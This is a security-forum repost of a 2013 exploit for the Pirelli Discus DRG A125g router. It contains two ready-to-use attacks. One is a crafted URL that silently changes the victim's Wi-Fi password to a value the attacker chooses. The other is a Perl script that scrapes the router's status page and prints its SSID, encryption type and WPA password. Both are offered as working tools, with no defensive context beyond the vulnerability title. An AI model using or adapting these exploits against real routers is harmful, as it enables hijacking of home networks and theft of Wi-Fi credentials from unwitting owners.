Pirelli Discus DRG A125g Remote Wifi Password Change 2013/11/23

Pirelli Discus DRG A125g suffers from a remote wifi password change vulnerability.

Watchers:
This resource is being watched by 24 members.
  1. Mr. Penguin
    Authored by Sebastian Magof
    Code:
    Select All
    # Exploit Title: Pirelli Discus DRG A125g remote change wifi password vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 # Exploit Author: Sebastián Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) # (**) αlpha #(")(") #Exploit: http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip #info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the password we want to put the victim wifi. If the victim clicks on the url your modem / router will reboot automatically with the new password provided by the attacker.
    Code:
    Select All
    #!/usr/bin/perl #Author: Sebastián Magof #Hardware: pirelli discus DRG A125g #Vulnerable file: wlbasic.html #Bug: Wifi Password Disclosure #Type: Local # (\/) # (**) ± #(")(") #usage:perl exploit.pl use LWP::UserAgent; use HTTP::Request; #begin print "\n\n************************************************************\n"; print "* Pirelli Discus ADSL DRG A125g Wifi password disclosure *\n"; print "************************************************************\n\n"; #wifi pwd disclosure file my $url = "http://10.0.0.2/wlbasic.html"; #UserAgent my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0"); #Request. my $req = HTTP::Request->new(GET => $url); my $request = $ua->request($req); my $content = $request->content(); #content my ($ssi) = $content =~ m/ssid = '(.+)'/; my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/; my ($enc) = $content =~ m/var wpa = '(.+)'/; #ssid+encryption method+pwd; print "Ssid: $ssi\n"; print "Encryption method: $enc\n"; print "Password: $pwd\n\n"; exit(0); __EOF__n
    GeekDeveloper likes this.
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K